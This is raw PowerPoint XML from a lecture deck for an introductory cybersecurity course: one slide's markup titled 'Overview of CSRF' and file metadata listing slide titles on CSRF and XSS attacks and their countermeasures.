        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422985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1030784" y="404664"/>
            <a:ext cx="7772400" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Overview of CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="1762125"/>
            <a:ext cx="8002945" cy="4118182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28755996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33099</TotalTime>
  <Words>2214</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>277</Paragraphs>
  <Slides>70</Slides>
  <Notes>55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ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Solstice</vt:lpstr>
      <vt:lpstr>CS 366 Intro to Cybersecurity</vt:lpstr>
      <vt:lpstr>Today’s Class</vt:lpstr>
      <vt:lpstr>Cross-Site Requests</vt:lpstr>
      <vt:lpstr>Cross-Site Requests</vt:lpstr>
      <vt:lpstr>Cross-Site Requests</vt:lpstr>
      <vt:lpstr>Problem with Cross-Site Requests </vt:lpstr>
      <vt:lpstr>Problem with Cross-Site Requests </vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Overview of CSRF</vt:lpstr>
      <vt:lpstr>CSRF Attacks on GET and POST</vt:lpstr>
      <vt:lpstr>HTTP GET: Login Form</vt:lpstr>
      <vt:lpstr>HTTP POST: Login Form</vt:lpstr>
      <vt:lpstr>CSRF Attack on GET</vt:lpstr>
      <vt:lpstr>CSRF Attack on GET</vt:lpstr>
      <vt:lpstr>CSRF Attack on GET</vt:lpstr>
      <vt:lpstr>CSRF Attack on GET</vt:lpstr>
      <vt:lpstr>CSRF Attack on GET</vt:lpstr>
      <vt:lpstr>CSRF Attack on GET</vt:lpstr>
      <vt:lpstr>CSRF Attack on GET</vt:lpstr>
      <vt:lpstr>CSRF Attack on GET</vt:lpstr>
      <vt:lpstr>CSRF Attack on POST</vt:lpstr>
      <vt:lpstr>CSRF Attack on POST</vt:lpstr>
      <vt:lpstr>Fundamental Cause of CSRF</vt:lpstr>
      <vt:lpstr>How to Defeat CSRF?</vt:lpstr>
      <vt:lpstr>Countermeasures</vt:lpstr>
      <vt:lpstr>Countermeasure: Referer Header</vt:lpstr>
      <vt:lpstr>Countermeasure: Referer Header</vt:lpstr>
      <vt:lpstr>Countermeasure: Same-Site Cookies</vt:lpstr>
      <vt:lpstr>Countermeasure: Same-Site Cookies</vt:lpstr>
      <vt:lpstr>Countermeasure: Secret Token </vt:lpstr>
      <vt:lpstr>Countermeasure: Secret Token </vt:lpstr>
      <vt:lpstr>Countermeasure: Secret Token </vt:lpstr>
      <vt:lpstr>Countermeasure: Secret Token </vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Overview of XSS</vt:lpstr>
      <vt:lpstr>XSS Attacks</vt:lpstr>
      <vt:lpstr>XSS Attacks</vt:lpstr>
      <vt:lpstr>Types of XSS Attacks</vt:lpstr>
      <vt:lpstr>Non-persistent (Reflected) XSS</vt:lpstr>
      <vt:lpstr>Non-persistent (Reflected) XSS</vt:lpstr>
      <vt:lpstr>Non-persistent (Reflected) XSS</vt:lpstr>
      <vt:lpstr>Non-persistent (Reflected) XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS: An Example</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Persistent (Stored) XSS attack</vt:lpstr>
      <vt:lpstr>Persistent (Stored) XSS attack</vt:lpstr>
      <vt:lpstr>Persistent (Stored) XSS attack</vt:lpstr>
      <vt:lpstr>Persistent XSS: an example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Persistent XSS in reality</vt:lpstr>
      <vt:lpstr>Damages caused by XSS</vt:lpstr>
      <vt:lpstr>Fundamental Cause of XSS</vt:lpstr>
      <vt:lpstr>Countermeasures</vt:lpstr>
      <vt:lpstr>Get rid of code: input filtering</vt:lpstr>
      <vt:lpstr>Get rid of code: output encoding</vt:lpstr>
      <vt:lpstr>Separate code from data: Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>Separate code from data: CSP</vt:lpstr>
      <vt:lpstr>CSP Example</vt:lpstr>
      <vt:lpstr>How to securely allow inlined code</vt:lpstr>
      <vt:lpstr>Other add-on countermeasures</vt:lpstr>
      <vt:lpstr>Summary: CSRF</vt:lpstr>
      <vt:lpstr>Summary: CSRF</vt:lpstr>
      <vt:lpstr>Summary: XSS</vt:lpstr>
      <vt:lpstr>Summary: XSS</vt:lpstr>
      <vt:lpstr>Discussion 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494/594  Computer and Network Security</dc:title>
  <cp:lastModifiedBy>Stella Sun</cp:lastModifiedBy>
  <cp:revision>281</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-08-24T15:10:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-13T11:24:53Z</dcterms:modified>
</cp:coreProperties>
</file>